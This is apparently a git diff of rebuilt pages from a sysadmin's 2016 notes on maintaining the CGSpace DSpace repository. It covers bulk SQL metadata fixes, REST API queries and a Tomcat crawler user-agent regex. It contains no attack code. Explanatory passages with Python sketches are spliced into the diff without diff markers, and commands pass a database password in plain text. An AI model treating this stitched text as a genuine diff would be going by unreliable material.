       UPDATE 10
      -dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
      +dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
       UPDATE 36
       
      • I updated the authority index but nothing seemed to change, so I’ll wait and do it again after I update Discovery below
      • @@ -336,7 +336,7 @@ UPDATE 36
      • Fix a bunch of countries in Open Refine and run the corrections on CGSpace:
      -
      $ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
      +
      $ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
       $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
       
      • Run a shit ton of author fixes from Peter Ballantyne that we’ve been cleaning up for two months:
      • @@ -345,10 +345,10 @@ $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -
      • Run a few URL corrections for ilri.org and doi.org, etc:
      -
      dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
      -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
      -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
      -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
      +
      dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
      +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
      +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
      +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
       
      • I skipped metadata fields like citation and description
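For reference, the logic of the DOI updates above can be sketched in Python. This is an illustration under assumptions, not the code that was run: rows are plain dictionaries rather than database records, the names `SKIPPED_FIELD_IDS`, `REWRITES`, and `fix_urls` are invented here, and field ID 219 in the usage example is a hypothetical field that is not in the skip list. Like PostgreSQL's `regexp_replace` without the `g` flag, it replaces only the first match in each value.

```python
import re

# Field IDs excluded in the DOI updates above.
SKIPPED_FIELD_IDS = {18, 26, 28, 111}

# (old prefix, new prefix) pairs from the DOI updates above.
REWRITES = [
    ("http://dx.doi.org", "https://dx.doi.org"),
    ("http://doi.org", "https://dx.doi.org"),
]


def fix_urls(rows):
    """Return copies of rows with old DOI URLs rewritten to HTTPS."""
    fixed = []
    for row in rows:
        text = row["text_value"]
        if row["metadata_field_id"] not in SKIPPED_FIELD_IDS:
            for old, new in REWRITES:
                # re.escape() makes the dots literal; count=1 mirrors
                # regexp_replace without the 'g' flag.
                text = re.sub(re.escape(old), new, text, count=1)
        fixed.append({**row, "text_value": text})
    return fixed


if __name__ == "__main__":
    rows = [
        {"metadata_field_id": 219, "text_value": "http://dx.doi.org/10.1/x"},
        {"metadata_field_id": 18, "text_value": "see http://doi.org/10.1/x"},
    ]
    for row in fix_urls(rows):
        print(row)
```

Note that the SQL patterns leave the dots unescaped, so they match any character there; the sketch escapes them to match only literal dots.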
      diff --git a/docs/2016-11/index.html b/docs/2016-11/index.html index 08b5166b7..9926638c3 100644 --- a/docs/2016-11/index.html +++ b/docs/2016-11/index.html @@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire’s Listings and Reports module Add dc.type to the output options for Atmire’s Listings and Reports module (#286) "/> - + @@ -160,7 +160,7 @@ java.lang.NullPointerException
      • Horrible one liner to get Linode ID from certain Ansible host vars:
      -
      $ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
      +
      $ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
       
      • I noticed some weird CRPs in the database, and they don’t show up in Discovery for some reason, perhaps the :
      • I’ll export these and fix them in batch:
      • @@ -170,7 +170,7 @@ COPY 22
      • Test running the replacements:
      -
      $ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
       
      • Add AMR to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (#288)
      @@ -200,11 +200,11 @@ COPY 22
    • Helping Megan Zandstra and CIAT with some questions about the REST API
    • Playing with find-by-metadata-field, this works:
    -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
     
    • But the results are deceiving because metadata fields can have text languages and your query must match exactly!
    -
    dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
    +
    dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
      text_value | text_lang
     ------------+-----------
      SEEDS      |
    @@ -215,23 +215,23 @@ COPY 22
     
  • So basically, the text language here could be null, blank, or en_US
  • To query metadata with these properties, you can do:
  • -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
     55
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
     34
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
     
    • The results (55+34=89) don’t seem to match those from the database:
    -
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
    +
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
      count
     -------
         15
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
      count
     -------
          4
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
      count
     -------
         66
    @@ -267,27 +267,27 @@ COPY 14
     
    • Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:
    -
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
    +
    dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
     UPDATE 85
     
    • The fix-metadata-values.py script I have is meant for specific metadata values, so if I want to update some text_lang values I should just do it directly in the database
    • For example, on a limited set:
    -
    dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
    +
    dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
     UPDATE 420
     
    • And assuming I want to do it for all fields:
    -
    dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
    +
    dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
     UPDATE 183726
     
    • After that I restarted Tomcat and PostgreSQL (because I’m superstitious about caches) and now I see the following in the REST API query:
    -
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
    +
    $ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
     71
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
     0
    -$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
    +$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
     
    • Not sure what’s going on, but Discovery shows 83 values, and database shows 85, so I’m going to reindex Discovery just in case
    @@ -298,7 +298,7 @@ $ curl -s -H "accept: application/json" -H "Content-Type: applica
  • So there is apparently this Tomcat native way to limit web crawlers to one session: Crawler Session Manager
  • After adding that to server.xml, bots matching the pattern in the configuration will all use ONE session, just like normal users:
  • -
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
    +
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -312,7 +312,7 @@ Vary: Accept-Encoding
     X-Cocoon-Version: 2.2.0
     X-Robots-Tag: none
     
    -$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
    +$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -336,7 +336,7 @@ X-Cocoon-Version: 2.2.0
     
    • Seems the default regex doesn’t catch Baidu, though:
    -
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
    +
    $ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -349,7 +349,7 @@ Transfer-Encoding: chunked
     Vary: Accept-Encoding
     X-Cocoon-Version: 2.2.0
     
    -$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
    +$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
     HTTP/1.1 200 OK
     Connection: keep-alive
     Content-Encoding: gzip
    @@ -365,17 +365,17 @@ X-Cocoon-Version: 2.2.0
     
  • Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:
  • <!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers -->
    -<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
    -       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
    +<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
    +       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
     
    • Looking at the bots that were active yesterday it seems the above regex should be sufficient:
    -
    $ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
    -Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
    -Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
    -Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
    -Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
    -Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
    +
    $ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
    +Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
    +Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
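
As a rough cross-check of the regex against the user agents in that log excerpt, the pattern can be tried out in Python. This is only a sketch: it assumes the valve matches the pattern against the whole User-Agent header (hence `fullmatch`), and the browser user agent is a made-up example of a non-bot client.

```python
import re

# Pattern copied from the crawlerUserAgents attribute above.
CRAWLER_PATTERN = re.compile(
    r".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*"
)

# User agents taken from the nginx log excerpt above.
BOT_USER_AGENTS = [
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
    "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)",
]

# Hypothetical ordinary browser, used only as a negative example.
BROWSER_USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"


def is_crawler(user_agent):
    """Return True if the whole user agent string matches the crawler pattern."""
    return CRAWLER_PATTERN.fullmatch(user_agent) is not None


for agent in BOT_USER_AGENTS + [BROWSER_USER_AGENT]:
    print(is_crawler(agent), agent)
```

YandexImages only matches because its URL happens to end in `bots`, so a crawler whose user agent contains none of these strings would still need to be added to the list by hand.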
     
    • Neat maven trick to exclude some modules from being built:
    @@ -393,9 +393,9 @@ COPY 2515
  • Send a message to users of the CGSpace REST API to notify them of upcoming upgrade so they can test their apps against DSpace Test
  • Test an update of old, non-HTTPS links to the CCAFS website in CGSpace metadata:
  • -
    dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
    +
    dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
     UPDATE 164
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
     UPDATE 7
     
    • Had to run it twice to get all (not sure about “global” regex in PostgreSQL)
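
A likely explanation for needing two passes is that PostgreSQL's `regexp_replace` only replaces the first match unless the `g` flag is passed as a fourth argument. The sketch below imitates both behaviours with Python's `re.sub`; the sample value is made up, and `count=1` is only standing in for the default PostgreSQL behaviour.

```python
import re

OLD = r"http://ccafs\.cgiar\.org"
NEW = "https://ccafs.cgiar.org"

# Made-up metadata value that contains the old link twice.
value = "See http://ccafs.cgiar.org/a and http://ccafs.cgiar.org/b"

# count=1 imitates regexp_replace without the 'g' flag: first match only.
first_only = re.sub(OLD, NEW, value, count=1)

# The default count=0 imitates regexp_replace(..., 'g'): every match.
all_matches = re.sub(OLD, NEW, value)

# A second first-match-only pass catches the remaining link.
second_pass = re.sub(OLD, NEW, first_only, count=1)

print(first_only)
print(all_matches)
```

With the global flag, one pass should be enough even for values that contain the link more than once.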
    • @@ -404,11 +404,11 @@ UPDATE 7
    • I’m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn’t as good
    • The results were very good, so I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:
    -
    $ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
    +
    $ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
     
    • In related news, I’m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace’s media filter has made thumbnails of THEM):
    -
    dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
    +
    dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
     
    • I’m not sure if there’s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore…
    @@ -464,7 +464,7 @@ UPDATE 7
  • One user says they are still getting a blank page when they log in (just CGSpace header, but no community list)
  • Looking at the Catalina logs I see there is some super long-running indexing process going on:
  • -
    INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
    +
    INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
     [>                                                  ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
     [>                                                  ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
     [>                                                  ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
    @@ -497,7 +497,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacete
     2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
     2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
     2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
    -2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
    +2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
     2016-11-29 07:56:36,608 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
     2016-11-29 07:56:36,701 INFO  org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
     2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
    diff --git a/docs/2016-12/index.html b/docs/2016-12/index.html
    index 66713f242..f68cfbdf2 100644
    --- a/docs/2016-12/index.html
    +++ b/docs/2016-12/index.html
    @@ -12,11 +12,11 @@
     CGSpace was down for five hours in the morning while I was sleeping
     While looking in the logs for errors, I see tons of warnings about Atmire MQM:
     
    -2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
     
     I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
     I’ve raised a ticket with Atmire to ask
    @@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
     CGSpace was down for five hours in the morning while I was sleeping
     While looking in the logs for errors, I see tons of warnings about Atmire MQM:
     
    -2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
     
     I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
     I’ve raised a ticket with Atmire to ask
     Another worrying error from dspace.log is:
     "/>
    -
    +
     
     
         
    @@ -137,11 +137,11 @@ Another worrying error from dspace.log is:
     
  • CGSpace was down for five hours in the morning while I was sleeping
  • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
  • -
